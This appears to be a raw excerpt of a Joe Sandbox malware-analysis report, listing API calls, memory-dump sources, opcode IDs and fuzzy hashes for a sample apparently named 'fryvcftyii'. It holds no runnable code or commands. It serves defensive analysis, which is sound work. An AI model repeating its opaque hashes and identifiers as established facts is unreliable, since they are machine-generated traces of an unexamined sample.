                            • __swprintf.LIBCMT ref: 0042ACC1
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044F910), ref: 0042ACFF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: c39dc35a9f615a6ec076b2651988c717646ca90e1d8ac4b64badc9d357846daa
                            • Instruction ID: 1e72b24d144ca3462541bff3a93dbed02fbd6549fc5ce7dbe5dc2e58d42bbaf8
                            • Opcode Fuzzy Hash: c39dc35a9f615a6ec076b2651988c717646ca90e1d8ac4b64badc9d357846daa
                            • Instruction Fuzzy Hash: 30219034A00109AFCB10DF65D945EAF7BB8EF49314B0040AAF909DB251DB71EE45CB61
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 0042115F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 00421184
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 0042118E
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 004211C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID: @B
                            • API String ID: 2875609808-2728856099
                            • Opcode ID: 85b4d0cebe9f5bea6e7e0640a82dabe3ee85c7b6c7401d3ca046c1b49e2b89f7
                            • Instruction ID: 406ab860ba248f7140ed3db0e1fb5e62138d144d181eef4580a7495e90efd2d1
                            • Opcode Fuzzy Hash: 85b4d0cebe9f5bea6e7e0640a82dabe3ee85c7b6c7401d3ca046c1b49e2b89f7
                            • Instruction Fuzzy Hash: 83117035E0056CD7CF009FA5E8446FEBBB8FF1E711F404066EA41B2250CB7459A0CB9A
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00421B19
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                            • API String ID: 3964851224-769500911
                            • Opcode ID: c00d2c51e16373b5f1d69d9976c53d3d7d7582ee46652dd293eceb76cec27114
                            • Instruction ID: b91ab4ea3599e1dbed8e1a1ed6db7b6748e793bdb90b27bec7929eefdd765cd0
                            • Opcode Fuzzy Hash: c00d2c51e16373b5f1d69d9976c53d3d7d7582ee46652dd293eceb76cec27114
                            • Instruction Fuzzy Hash: 5B11A531D401689FCF04DF54D8519FEB7B4FF25304B50846AD814AB7A1EB326D46CB54
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043EC07
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0043EC37
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0043ED6A
                            • CloseHandle.KERNEL32(?), ref: 0043EDEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: 1109e852ee5b5861539ec6fb8a5f67dfbf755022bfae64b1a6588a7eb8cac48e
                            • Instruction ID: 67bd43a3ed52ea1fbd1cb8f2862bc26c5b0b02badbe6bb8d4d6c70e9794e2bdb
                            • Opcode Fuzzy Hash: 1109e852ee5b5861539ec6fb8a5f67dfbf755022bfae64b1a6588a7eb8cac48e
                            • Instruction Fuzzy Hash: DD8170716003019FD721EF29C846F2AB7E5AF88710F05881EF99ADB3D2DA74AD41CB55
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004400FD
                            • RegOpenKeyExW.ADVAPI32 ref: 0044013C
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00440183
                            • RegCloseKey.ADVAPI32(?), ref: 004401AF
                            • RegCloseKey.ADVAPI32(00000000), ref: 004401BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 723802ba293df36268fc46c257a442d9210f766e7983de57c5eed0153734f797
                            • Instruction ID: f124bba484b50eb4bb6b9e5f2b495a2b058d1ab5ffc60fd55328bae34dfa997c
                            • Opcode Fuzzy Hash: 723802ba293df36268fc46c257a442d9210f766e7983de57c5eed0153734f797
                            • Instruction Fuzzy Hash: 0D516831208204AFD715EF68C881F6AB7E9FF88304F00492EF5958B2A2DB35ED55CB56
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D927
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D9AA
                            • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D9C6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DA07
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DA21
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: 821ae6c7b61ef135a5b7dd4d786566e86da8191743d592a34de822ebeadcf653
                            • Instruction ID: 1bb5897c4d5247716567e20365e6d3f7a29d4efe718821128a70226940d21e0c
                            • Opcode Fuzzy Hash: 821ae6c7b61ef135a5b7dd4d786566e86da8191743d592a34de822ebeadcf653
                            • Instruction Fuzzy Hash: F9510475A00209DFCB01EFA8D484EAEB7B5FF0D320B05806AE855AB312DB35AD45CB95
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32 ref: 0042E61F
                            • GetPrivateProfileSectionW.KERNEL32 ref: 0042E648
                            • WritePrivateProfileSectionW.KERNEL32 ref: 0042E687
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 0042E6AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 0042E6B4
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 9fcc56150684ff41df2c106e491c99a16bc2535a9595b76cb15e5e2bdeb9cfd1
                            • Instruction ID: 3d136d9ec82472de3ed3e52850047278ae920e8f961c9b1800d94fc390a59a64
                            • Opcode Fuzzy Hash: 9fcc56150684ff41df2c106e491c99a16bc2535a9595b76cb15e5e2bdeb9cfd1
                            • Instruction Fuzzy Hash: B6513935A00215EFCB01EF65D985EAEBBF5FF09314B1480A9E809AB361CB35ED51CB54
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 922a86a3029f727976523e7e708321f20ea652e5e72ddfdacf78d50cb3ae0e1f
                            • Instruction ID: 77620968c841cb3de0719365ca782bcd32006cf782a4f43813d8e4a93a4a3cae
                            • Opcode Fuzzy Hash: 922a86a3029f727976523e7e708321f20ea652e5e72ddfdacf78d50cb3ae0e1f
                            • Instruction Fuzzy Hash: E7419039604109FBDF169F68C844FEABB74BB05360F21432AF829922A0CB349D54DB91
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004163E7
                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00416433
                            • TranslateMessage.USER32(?), ref: 0041645C
                            • DispatchMessageW.USER32(?), ref: 00416466
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00416475
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                            • String ID:
                            • API String ID: 2108273632-0
                            • Opcode ID: 0bd49f136ccc69cee8d18f2c6eec8dc1a7e7339d89033e9b8b99d39400b87252
                            • Instruction ID: 2c3b2fdda9489028c616fa4f811963255a09b5f4535ce1d87f03cf12ee60e743
                            • Opcode Fuzzy Hash: 0bd49f136ccc69cee8d18f2c6eec8dc1a7e7339d89033e9b8b99d39400b87252
                            • Instruction Fuzzy Hash: 4231A331900656AFDB24DFB4DC44BEB7BA8AB01300F16457BE825C22A1E729D4C9DB6D
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00418A30
                            • PostMessageW.USER32 ref: 00418ADA
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00418AE2
                            • PostMessageW.USER32 ref: 00418AF0
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00418AF8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: b9fcea513af41dd8621aee28db12ad7dd97efcbac194bc3b7674d4dd29487c89
                            • Instruction ID: 5a0fe0b105ea1a2238d1b221325a6d450e5b3f1036d34ab82b5dd2513c6ef565
                            • Opcode Fuzzy Hash: b9fcea513af41dd8621aee28db12ad7dd97efcbac194bc3b7674d4dd29487c89
                            • Instruction Fuzzy Hash: 8231EE71900219EBDF14CFA8D94CADE3BB5EF05315F10822AF924EA2D0C7B49954CB94
                            APIs
                            • IsWindowVisible.USER32(?), ref: 0041B204
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041B221
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041B259
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 0041B27F
                            • _wcsstr.LIBCMT ref: 0041B289
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: a6e39e8e31a6abad244bbf57494ace6dabcbf3951e502921d73db6434b1a3669
                            • Instruction ID: 8c08e4be85c8d254045c545b7bcba68796032f03b6e1d210f2d8e90639f928b2
                            • Opcode Fuzzy Hash: a6e39e8e31a6abad244bbf57494ace6dabcbf3951e502921d73db6434b1a3669
                            • Instruction Fuzzy Hash: ED2107312042507BEB255B759C09EBF7B9CDF4A750F00417AF808DE2A1EFB5DC8596A4
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044B192
                            • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1B7
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1CF
                            • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1F8
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0044B216
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: f2f7e21d1b3c6b8bfdb8c6473fbdc4435a43ada3e17d6569ca9747faf07d17ed
                            • Instruction ID: 7d19397d903bba2afbabba7a7eacd56d2dfdc0674d6bdccb70fb244322a8a4e4
                            • Opcode Fuzzy Hash: f2f7e21d1b3c6b8bfdb8c6473fbdc4435a43ada3e17d6569ca9747faf07d17ed
                            • Instruction Fuzzy Hash: B8218071910651AFDB109F789C08A6A3BA4FB06361F114B3AB922D72E0D734D8219B98
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00419320
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00419352
                            • __itow.LIBCMT ref: 0041936A
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00419392
                            • __itow.LIBCMT ref: 004193A3
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: 31055361bb23fb69776b437317d2b9f56b450a4755efb764b7e77d70b224212f
                            • Instruction ID: e5f403a62db63b10a4dbcb52cdd81383f9308a088270282ab9c04e28e37c6007
                            • Opcode Fuzzy Hash: 31055361bb23fb69776b437317d2b9f56b450a4755efb764b7e77d70b224212f
                            • Instruction Fuzzy Hash: F121073170120CBBDB119B658C99EEE7BA8EB4D720F44402AFD04DB2C0D6B48D858B95
                            APIs
                            • IsWindow.USER32(00000000), ref: 00435A6E
                            • GetForegroundWindow.USER32 ref: 00435A85
                            • GetDC.USER32(00000000), ref: 00435AC1
                            • GetPixel.GDI32(00000000,?,00000003), ref: 00435ACD
                            • ReleaseDC.USER32(00000000,00000003), ref: 00435B08
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: b3f2f8084eb84bbbb77d9d7a850d26e8df9bfdf9730a8673b956906f1cba3a78
                            • Instruction ID: 039f6854145a2cf6affa6225623ccd0f32c2ef49bff73d4185cd712b0571047f
                            • Opcode Fuzzy Hash: b3f2f8084eb84bbbb77d9d7a850d26e8df9bfdf9730a8673b956906f1cba3a78
                            • Instruction Fuzzy Hash: 65219F35A00204AFD700EFA5DC88A9ABBE5EF49310F15807EF809D7362CA74AC05CB94
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 003C134D
                            • SelectObject.GDI32(?,00000000), ref: 003C135C
                            • BeginPath.GDI32(?), ref: 003C1373
                            • SelectObject.GDI32(?,00000000), ref: 003C139C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: cd40c943b9d3a7cebfc3f2efff27f3a4606ba0596b56887bdc32a7b58d2cd998
                            • Instruction ID: 1b58d45d71a7eb5f3e0e34a2873c7d004eca72f31903069e04d87f85595ba8c7
                            • Opcode Fuzzy Hash: cd40c943b9d3a7cebfc3f2efff27f3a4606ba0596b56887bdc32a7b58d2cd998
                            • Instruction Fuzzy Hash: 59215E35800648EBDB12AF65DC08B6D7BE8EB02325F144A3FE810D65B1D7719CA5EF98
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00424ABA
                            • __beginthreadex.LIBCMT ref: 00424AD8
                            • MessageBoxW.USER32 ref: 00424AED
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00424B03
                            • CloseHandle.KERNEL32(00000000), ref: 00424B0A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                            • String ID:
                            • API String ID: 3824534824-0
                            • Opcode ID: 3e402cafa17a6fd75ffc00f2451b9b010fdeacfc16d91215cb38dd04053215b9
                            • Instruction ID: 146c76699ed1b9b220670d7226288582fc3aba91aefb995c600f69185d0df059
                            • Opcode Fuzzy Hash: 3e402cafa17a6fd75ffc00f2451b9b010fdeacfc16d91215cb38dd04053215b9
                            • Instruction Fuzzy Hash: AF110876A04664BBC7018FA8AC08A9F7FACEB85320F1442BAF814D3350DA75DD048BA5
                            APIs
                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0041821E
                            • GetLastError.KERNEL32(?,00417CE2,?,?,?), ref: 00418228
                            • GetProcessHeap.KERNEL32(00000008,?,?,00417CE2,?,?,?), ref: 00418237
                            • HeapAlloc.KERNEL32(00000000,?,00417CE2,?,?,?), ref: 0041823E
                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00418255
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: c08f54d20f9278584e0c81f8637786b132fb90be4b380b1a7847667a25af8352
                            • Instruction ID: 4dfb2fd963fa47ac34de6f03f277732643d42b2686be4ccd1398a2db3c6bc835
                            • Opcode Fuzzy Hash: c08f54d20f9278584e0c81f8637786b132fb90be4b380b1a7847667a25af8352
                            • Instruction Fuzzy Hash: 2F016975200604BFDB214FA6DC48DAB7BACEF8B754B60047AFD09C2220DA318C44CA64
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 00417127
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00417142
                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00417044,80070057,?,?), ref: 00417150
                            • CoTaskMemFree.OLE32(00000000), ref: 00417160
                            • CLSIDFromString.OLE32(?,?), ref: 0041716C
                            Memory Dump Source
